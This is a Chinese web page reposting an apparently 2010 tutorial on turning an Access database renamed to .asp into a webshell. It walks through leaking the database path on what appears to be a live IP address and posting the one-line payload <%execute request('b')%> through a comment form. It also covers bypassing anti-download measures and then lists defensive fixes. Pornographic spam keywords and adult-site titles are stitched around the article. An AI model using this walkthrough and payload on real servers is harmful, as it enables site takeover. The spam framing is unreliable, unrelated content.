公交车上荫蒂添的好舒服的电影-公用玩物(np双xing总受)-公用小荡货芊芊-公与妇仑乱hd-攻把受做哭边走边肉楼梯play-古装一级淫片a免费播放口

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

access改mdb為asp所帶來的災難 附mdb防下載方法

admin
2010年11月26日 0:46 本文熱度 4080
可能是隨著網絡安全技術的發展吧,管理員的素質都在提高,在使用access+asp系統時,為不數據庫被人下載,到把mdb改為asp或asa。
先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數據庫直接得到webshell。

一.思路

  大家都知道<%%>為asp文件的標志符,也就是說一個asp文件只會去執行<%%>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數據里包含有<%%>,那當我們訪問這個asp數據庫的時候就會去執行<%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。

二.示例

  隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210


  返回:
復制代碼 代碼如下:
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。

/test/conn.asp,行18


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:

<%execute request("b")%>

  這樣我們就把asp代碼:<%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

復制代碼 代碼如下:
/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'

類型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用<%execute request("b")%>。

三.其他一些問題和思路

  1.對于改了后綴為asp,還對數據庫里加入了<%='a'-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。

  2.對于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。

mdb防下載方法小結

1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現文件沒有找到的404錯誤。
因此你可以將數據庫任意命名成一個絕對不會出現的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx


2 將數據庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站
則把數據庫放在e:/

3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 <% 的二進制字符 這樣訪問文件出現 缺少腳本關閉符的提示。
4 或者將.mdb 改成.asp 同時用winhex打開 可以發現176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現防止下載,這樣也不影響數據庫功能。例如:
<%
response.write("非法訪問")
response.end()
%>


現在在數據庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “<%35” 而空格 = “<%20”

所以說 現在用這些已經不管用了。。


如果是自己的服務器的話就在IIS里設置一下:

新建一個空白的DLL文件,然后在IIS里添加映射,可執行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。

該文章在 2010/11/26 0:46:14 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 精品啪啪一区二区 | 国产a级三级三级三级 | 国产高清视频青青青在线 | 国产精品青青青高清在线密亚 | 丰满少妇乱子伦精品无码专区 | 国产高清av在线播放 | 囯产精品宾馆在线精品酒店 | 国产精品午夜一区二区 | 国产一区二区三区高清在线 | 国产毛片毛多水多密月 | 成年站免费网 | 91精品无码中文字幕在线 | 精品亚洲成a人片在线观看少妇蜜 | 国产麻豆视传媒 | 果冻传媒aⅴ毛片无码蜜桃 果冻传媒app在线播放 | 国产一区二区三区精品诱惑网站 | 国产精品人妻无码久久久郑州 | 国产精品云霸高清中字 | 国产成人精品无码免费看夜聊软件 | 国产成人高清亚洲一区 | 国产自偷在线拍精品热乐播av | 成人午夜啪啪免费网站 | 国精品午夜福利视频不卡麻豆 | 69天堂人成无码麻豆免费视频 | 99国产精品一区无码 | 国色天香精品一卡2卡3卡 | 国产91熟女高潮一区二区 | 国产午夜精品精品 | 国产成人一区二区三区精品 | 国产1区2区3| 国内精品视频一区二区三区 | 国产精品调教视频一区 | 国产探花 | 2025亚洲中文字 | 精品日韩妖精视频在线观看免费 | 妇女毛片精品久久 | 韩国无码色视频在线观看 | 国产一区二区福利久久 | 国产成人手机高清在线观看网站 | 国产女人喷潮视频在线观看 | 国产精品盗摄在线观看 |